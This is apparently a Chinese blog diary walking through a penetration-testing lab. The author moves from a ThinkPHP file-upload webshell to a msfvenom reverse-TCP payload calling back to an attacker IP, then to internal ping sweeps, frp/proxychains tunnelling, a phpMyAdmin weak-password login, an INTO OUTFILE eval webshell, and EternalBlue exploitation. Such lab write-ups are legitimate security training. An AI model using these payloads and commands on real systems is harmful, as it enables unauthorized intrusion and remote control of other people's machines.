LOADING

wait wait wait...

渗透靶场日记 02

复健另一套渗透靶场🎯

网络拓扑结构如下:

img

门户网站192.168.1.54nmap扫一下

img

dirsearch扫入口点python3 dirsearch.py -u 192.168.1.54 -F -e php

img

得到/shopThinkPHP5.0,修改头像上传图片的地方就有文件上传的漏洞,1.png写一句话马进去

img

img

改后缀为.php重发包,响应数据包看到上传路径/shop/upload/avator/20241111191152329.php

img

AntSword连上看看操作系统版本信息

img

接着想利用msfconsole写个shell.elf进去(4444端口,本地kali ip为88.88.88.88

img

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=88.88.88.88 lport=4444 -f elf > shell.elf

img

shell.elf传到/var/www/html/shop/upload/avator/目录下

img

赋权限执行后,MSF成功接收shell

img

接着扫内网存活情况,仍然传到/var/www/html/shop/upload/avator/目录下

IPscan.sh

#!/bin/bash
for ip in 192.168.1.{1..254}
do
    ping $ip -c 1 &> /dev/null
        if [ $? -eq 0 ];then
            echo "$ip is alive .... " > ip_result.txt
            echo $ip is alive ....
        fi
done

img

扫到192.168.1.182IP,猜测对应网络拓扑中的“数据库服务器”

NetScan.sh

#!/bin/bash
for ip in 192.168.{1..10}.1
do
    ping $ip -c 1 &> /dev/null
        if [ $? -eq 0 ];then
            echo "$ip is alive .... " > ip_result.txt
            echo $ip is alive ....
        fi
done

img

发现存活网段192.168.2.0/24,改一下IPscan.sh扫2段网络

img

.106.201猜测对应网络拓扑中主机A与主机B

frpcfrpc.ini搭建内网隧道

img

和上一套渗透一样,vim /etc/proxychains.conf开启dynamic_chain添加socks5 127.0.0.1 9998

使用代理nmap扫描

192.168.1.182的开放端口proxychains4 nmap -Pn -sT 192.168.1.182,开放22803306端口

img

192.168.2.106的开放端口proxychains4 nmap -Pn -sT 192.168.2.1068013513944533063389端口开放

img

firefox配置代理,登进192.168.2.106:80内网

img

img

proxychain python3 dirsearch.py -u 192.168.2.106:80 -e *

扫到/phpmyadmin路由

img

img

弱密码root:root登入,在typecho数据库执行select @@basedir查看数据库安装路径

img

发现是phpstudy建的站,去www目录下写马

select '<?php @eval($_POST[cmd]);?>' into outfile 'c:/phpstudy/www/11.php';

img

成功上线

img

192.168.2.201的开放端口proxychains4 nmap -Pn -sT 192.168.2.201

img

445端口开放怀疑存在永恒之蓝(ms17010)漏洞,首先检测是否存在

proxychains msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.2.201
run

img

打完收工

use exploit/windows/smb/ms17_010_eternalblue
set lhost 88.88.88.88
set rhosts 192.168.2.201
set payload windows/x64/meterpreter/bind_tcp
run

img

漏洞都有点入门级别了,打着玩了就当

img